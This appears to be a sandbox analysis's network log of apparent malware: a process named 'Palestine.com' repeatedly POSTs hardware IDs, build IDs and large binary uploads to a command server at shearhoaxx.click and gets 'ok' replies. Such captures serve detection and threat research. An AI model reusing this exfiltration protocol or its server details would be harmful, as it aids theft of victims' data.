2024-12-23 09:36:08 UTC | 12836 | OUT | Data Raw: 2d 2d 4c 51 56 4e 4b 4c 4c 33 36 59 47 33 52 43 55 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 4c 51 56 4e 4b 4c 4c 33 36 59 47 33 52 43 55 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 51 56 4e 4b 4c 4c 33 36 59 47 33 52 43 55 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38 38 0d 0a 2d 2d 4c
                                                                                                                                                                                                                                            Data Ascii: --LQVNKLL36YG3RCUP2Content-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--LQVNKLL36YG3RCUP2Content-Disposition: form-data; name="pid"2--LQVNKLL36YG3RCUP2Content-Disposition: form-data; name="lid"Dvh8ui--888--L
2024-12-23 09:36:09 UTC | 1126 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:36:09 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=14im129k8fp9vsiff1anagjk7g; expires=Fri, 18 Apr 2025 03:22:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u9bVvJGCTRJYcYUA6IRNBvWq2Tv01nqOHj8IXrLjex%2FDdIoJbMM9TXl64CS2UDj1hXXzADMRTxdKKXOcXcK2233%2FBi4Qr%2BlS4ElbqRHxX4K2o%2BqbtP4awsd01b66TWQc6R5L"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675d98df1e4303-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2168&min_rtt=2159&rtt_var=829&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2841&recv_bytes=13775&delivery_rate=1304736&cwnd=219&unsent_bytes=0&cid=16d1d50a43ec3e0b&ts=856&x=0"
2024-12-23 09:36:09 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
2024-12-23 09:36:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.16 | 49716 | 172.67.129.49 | 443 | 6148 | C:\Users\user\AppData\Local\Temp\650429\Palestine.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 09:36:11 UTC | 276 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=ZW6C9XEVM7Q6
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 15041
                                                                                                                                                                                                                                            Host: shearhoaxx.click
2024-12-23 09:36:11 UTC | 15041 | OUT | Data Raw: 2d 2d 5a 57 36 43 39 58 45 56 4d 37 51 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 5a 57 36 43 39 58 45 56 4d 37 51 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 5a 57 36 43 39 58 45 56 4d 37 51 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38 38 0d 0a 2d 2d 5a 57 36 43 39 58 45 56 4d 37 51 36 0d 0a 43 6f
                                                                                                                                                                                                                                            Data Ascii: --ZW6C9XEVM7Q6Content-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--ZW6C9XEVM7Q6Content-Disposition: form-data; name="pid"2--ZW6C9XEVM7Q6Content-Disposition: form-data; name="lid"Dvh8ui--888--ZW6C9XEVM7Q6Co
2024-12-23 09:36:12 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:36:12 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=oofl1ikkqd51p4pfpr1cmd3gq1; expires=Fri, 18 Apr 2025 03:22:50 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yhQHsPp5dfJuLvgD6Eshg1%2FvOmiVo9H8zWIORnJG9HprQOi0gRg%2FnYqtOMJ8Nx87x01SFPEoEL7rqU7hugm8m0%2ByQZnMdj%2FET63om53ukWiDQ9815DChYhKIgShWDusAfSdy"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f675da7290143a1-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1738&rtt_var=664&sent=13&recv=20&lost=0&retrans=0&sent_bytes=2841&recv_bytes=15975&delivery_rate=1633109&cwnd=233&unsent_bytes=0&cid=26a84796ff98470f&ts=1152&x=0"
2024-12-23 09:36:12 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
  Data Ascii: fok 8.46.123.189
2024-12-23 09:36:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.16 | 49717 | 172.67.129.49 | 443 | 6148 | C:\Users\user\AppData\Local\Temp\650429\Palestine.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 09:36:13 UTC | 273 | OUT | POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=U3E7FSXK7
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 20366
  Host: shearhoaxx.click
2024-12-23 09:36:13 UTC | 15331 | OUT | Data Raw: 2d 2d 55 33 45 37 46 53 58 4b 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 55 33 45 37 46 53 58 4b 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 33 45 37 46 53 58 4b 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38 38 0d 0a 2d 2d 55 33 45 37 46 53 58 4b 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
  Data Ascii: --U3E7FSXK7Content-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--U3E7FSXK7Content-Disposition: form-data; name="pid"3--U3E7FSXK7Content-Disposition: form-data; name="lid"Dvh8ui--888--U3E7FSXK7Content-Dispos
2024-12-23 09:36:13 UTC | 5035 | OUT | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 60 14 2c 6c fa 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 04 bf 16 4b 06 d7 e2 c1 b5 e0 df 06 5f 33 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  Data Ascii: `aO`,li`M?lrQMn 64K_3
2024-12-23 09:36:14 UTC | 1123 | IN | HTTP/1.1 200 OK
  Date: Mon, 23 Dec 2024 09:36:14 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=mgh5eckhs0erpbqtcg7pfn85q7; expires=Fri, 18 Apr 2025 03:22:53 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dXgCz8L6xqeZnBrgjOlugLEiZrxXNE8BHdpzd9JOJoUBn19N20ScENf4esjTSQz1NtpB4dzr2tMM25P0cnaOhnKigUzmPhrDF%2FCe1hrlpYPpjS%2B6lBSgi8goyECOyGcaPa7K"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f675db7becc42dc-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1730&rtt_var=666&sent=16&recv=26&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21319&delivery_rate=1623123&cwnd=251&unsent_bytes=0&cid=39968d48a70fe472&ts=976&x=0"
2024-12-23 09:36:14 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
  Data Ascii: fok 8.46.123.189
2024-12-23 09:36:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.16 | 49718 | 172.67.129.49 | 443 | 6148 | C:\Users\user\AppData\Local\Temp\650429\Palestine.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 09:36:16 UTC | 278 | OUT | POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=RJF31Z0V4QLBNKJ
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 1167
  Host: shearhoaxx.click
2024-12-23 09:36:16 UTC | 1167 | OUT | Data Raw: 2d 2d 52 4a 46 33 31 5a 30 56 34 51 4c 42 4e 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 52 4a 46 33 31 5a 30 56 34 51 4c 42 4e 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 4a 46 33 31 5a 30 56 34 51 4c 42 4e 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38 38 0d 0a 2d 2d 52 4a 46 33 31 5a 30
  Data Ascii: --RJF31Z0V4QLBNKJContent-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--RJF31Z0V4QLBNKJContent-Disposition: form-data; name="pid"1--RJF31Z0V4QLBNKJContent-Disposition: form-data; name="lid"Dvh8ui--888--RJF31Z0
2024-12-23 09:36:16 UTC | 1126 | IN | HTTP/1.1 200 OK
  Date: Mon, 23 Dec 2024 09:36:16 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=6115bgbkov8haufvgibuonpla6; expires=Fri, 18 Apr 2025 03:22:55 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hKY%2FUV%2BsPWlLIgeWSIxXm4SRowd6O6VOhXPscZPRfhkLa8i%2FHo9CCVRB1KheNaqZYTGhi6kxBSzpVM3BHMTVHxss86hnq%2Be%2FhvyeZC3PZGAQk5tK8jZPhj4QwNkvX6QDarmu"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f675dc6caae433e-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1763&min_rtt=1759&rtt_var=668&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2081&delivery_rate=1626740&cwnd=249&unsent_bytes=0&cid=a448cbe34bf15425&ts=754&x=0"
2024-12-23 09:36:16 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
  Data Ascii: fok 8.46.123.189
2024-12-23 09:36:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.16 | 49719 | 172.67.129.49 | 443 | 6148 | C:\Users\user\AppData\Local\Temp\650429\Palestine.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 09:36:18 UTC | 274 | OUT | POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=XMMU9DZE5L
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 59251
  Host: shearhoaxx.click
2024-12-23 09:36:18 UTC | 15331 | OUT | Data Raw: 2d 2d 58 4d 4d 55 39 44 5a 45 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 58 4d 4d 55 39 44 5a 45 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 4d 4d 55 39 44 5a 45 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38 38 0d 0a 2d 2d 58 4d 4d 55 39 44 5a 45 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
  Data Ascii: --XMMU9DZE5LContent-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--XMMU9DZE5LContent-Disposition: form-data; name="pid"1--XMMU9DZE5LContent-Disposition: form-data; name="lid"Dvh8ui--888--XMMU9DZE5LContent-Di
2024-12-23 09:36:18 UTC | 15331 | OUT | Data Raw: 04 c8 9d b0 20 93 28 7a 82 d5 11 b4 56 e3 57 55 82 3a a9 d5 86 16 7d ee dc e8 1c fb 59 3d a9 1b 63 89 0e b5 69 c3 2f 2a bb 26 03 ec e6 61 58 ff f9 9c 1b 66 e8 aa ea 34 f8 32 47 17 ba fe e2 bc 9e 65 f4 66 e5 e3 a2 83 bd bd d8 19 a9 18 83 f2 b7 a9 d9 e0 72 33 30 b1 da e6 ec 54 a8 bd aa f7 bd 75 b6 2f e2 05 a9 f7 fd 0b 38 d6 32 f1 4c ea 7e 48 c6 d9 84 80 30 49 60 a1 d0 da 3e 61 6b c5 b6 18 dd 6e 1f 3a 8d 91 a5 58 68 38 08 cb b9 16 d7 7f ea d7 ad 6b 54 29 ee 3f 5b fc 97 1f 75 72 42 f2 ae 3d 85 9e 6b 15 3b 6c 74 a5 2b b2 d7 27 7c e9 e2 de 72 5c bb 8d 61 bb c1 33 ce 26 b0 59 fa f0 67 81 86 77 f8 c9 59 39 6b 88 7a f5 8d 98 4d ff 47 28 92 db db 4d 7f 82 e8 b3 bd a7 e9 5f fc 85 54 86 14 7c 94 35 39 65 2e 25 71 29 9e 87 92 a0 a1 6e 68 51 35 9f 9e 61 9e da 95 a1 0b
  Data Ascii: (zVWU:}Y=ci/*&aXf42Gefr30Tu/82L~H0I`>akn:Xh8kT)?[urB=k;lt+'|r\a3&YgwY9kzMG(M_T|59e.%q)nhQ5a
2024-12-23 09:36:18 UTC | 15331 | OUT | Data Raw: ef e9 c9 f6 dd 09 7d 78 44 3a 65 e0 72 a2 74 e0 01 0b 62 ef c7 69 0e ca 1b c4 37 65 be ef 69 fc f3 88 5c 8b 1f 49 6c a3 95 3d 3f 83 cf ec e1 5a 38 85 6f 98 df e9 5c 57 c5 8b 8d 7c f3 4f 4f 79 ff d1 d4 3a 4c 3a 64 3d c1 e3 4c 93 ff 06 87 5c 39 7e 2f b8 68 71 71 cb bc 1d c1 ba 5f fb 29 29 7a 1a 9f a4 8f c4 5e 53 4c 22 28 7c 23 d0 7f 0f 0b 9f dc b1 7e 75 b1 c1 7f 83 28 14 80 3b d9 e4 19 bc 5a 7d 6b 13 df be b8 73 6e a5 fa a5 7f 7d cd 8b e8 61 1c f7 ae dc 9b bd 90 6a 7f 86 e1 b2 5f f5 d7 3a b0 4e a6 b8 68 3d 80 6e 07 ab fe 12 1d ef 07 5f dc 23 78 1e 1e 7c 39 43 0b da 99 98 30 24 79 78 f0 2c d5 32 7f d2 31 22 d7 96 77 dd 65 23 e0 b8 34 be 63 cd 2b 0e 56 59 5b b0 a6 5f 11 7f bb bd 21 49 ec fb b4 04 65 9b 93 4b bb 7c e0 26 c5 09 07 ac 24 12 f7 1e 0a b8 e1 d9 a6
  Data Ascii: }xD:ertbi7ei\Il=?Z8o\W|OOy:L:d=L\9~/hqq_))z^SL"(|#~u(;Z}ksn}aj_:Nh=n_#x|9C0$yx,21"we#4c+VY[_!IeK|&$
2024-12-23 09:36:18 UTC | 13258 | OUT | Data Raw: fc 09 ff 29 b0 a2 f7 45 9b 4a 29 bd be a4 12 f6 3f b0 eb 6f fa 74 02 5e 36 26 6c c2 40 99 ab df ff 18 02 c3 f7 c2 0d 81 91 a4 54 2c 88 3c cb b3 ea 42 9c 6e 9d 24 37 fb f9 0d a9 07 2c 0d 87 fd bd c9 c1 30 04 52 32 72 8f 22 53 4c b8 4e 16 33 21 de f4 7b 5c de e1 c2 14 fe 7a 75 1c 71 67 53 50 7d b7 84 0a 33 76 b4 50 4e e0 42 31 fb f7 d4 5b 6f 21 05 89 cb a1 fd 2f ce 47 ae 88 d9 ed ae 9e 87 74 9e 3e b8 71 92 00 22 52 48 94 df 61 85 d9 ae 27 4e ce bf ed 53 5f bc df c1 44 f2 68 98 c7 4a cc 73 de 7c 03 e2 8e 8b 4c fb 37 38 f0 20 e5 f2 ef 77 a0 9d 1e ba bc 40 0f 2d 71 45 14 a1 d0 fc c4 e5 73 9f 1c 29 ad ba 14 22 5e d3 77 9b 8f 64 69 be f5 47 41 0a ad 71 eb 70 ba db 7f de 3c 95 63 01 4d 19 13 96 b4 6c f8 b4 13 b2 0b 66 40 14 17 47 b9 9f 5d fa f7 ee e4 ec 29 68 ea
                                                                                                                                                                                                                                            Data Ascii: )EJ)?ot^6&l@T,<Bn$7,0R2r"SLN3!{\zuqgSP}3vPNB1[o!/Gt>q"RHa'NS_DhJs|L78 w@-qEs)"^wdiGAqp<cMlf@G])h
2024-12-23 09:36:19 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:36:19 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=4n66bntu1bp8dr4nhv20evadsb; expires=Fri, 18 Apr 2025 03:22:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R1Aq4OxjmsFw%2Fq6C6noTVgHIMmtnYaTuwAgg44dkWQ0N%2FRSBDDVEglQrur4D%2FeZLL44C7yTvFgsQavoDTZMmRot9AcahqBpRBvXyBvcZGnhSUiG04%2Fr1UmIcMCrdzL959Rkq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675dd4cf317d24-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2022&min_rtt=2012&rtt_var=774&sent=31&recv=64&lost=0&retrans=0&sent_bytes=2841&recv_bytes=60315&delivery_rate=1395126&cwnd=193&unsent_bytes=0&cid=de62d8a48215cade&ts=1289&x=0"
2024-12-23 09:36:19 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f\r\nok 8.46.123.189\r\n   (chunked body: "f" is the hex chunk size, 15 bytes, not part of the reply)
2024-12-23 09:36:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0\r\n\r\n   (zero-length chunk terminating the chunked body)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.16 | 49720 | 172.67.129.49 | 443 | 6148 | C:\Users\user\AppData\Local\Temp\650429\Palestine.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 09:36:21 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 80
Host: shearhoaxx.click
2024-12-23 09:36:21 UTC | 80 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 76 68 38 75 69 2d 2d 38 38 38 26 6a 3d 26 68 77 69 64 3d 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45
Data Ascii: act=get_message&ver=4.0&lid=Dvh8ui--888&j=&hwid=6E31A45A7B5F2CA1C8BA21E021A8AA6E
2024-12-23 09:36:21 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:36:21 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=a7u6g7c1ss536gl4am1cj2rpnp; expires=Fri, 18 Apr 2025 03:23:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fTSvMsCDiTIruyI9X3EC9DwafChfwtPSq6A6U9YfJ1m3I70OIFsjyXVHuKAhkhuW%2FVlomM6S2umGLbxOlaeVhIm%2Bjq2Guh8nbLOPMb%2BCdAShPYwmcUpFMST00bzwBJK%2Fy7Ww"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675de528564257-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1623&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=980&delivery_rate=1772920&cwnd=215&unsent_bytes=0&cid=49207bfb3104156a&ts=766&x=0"
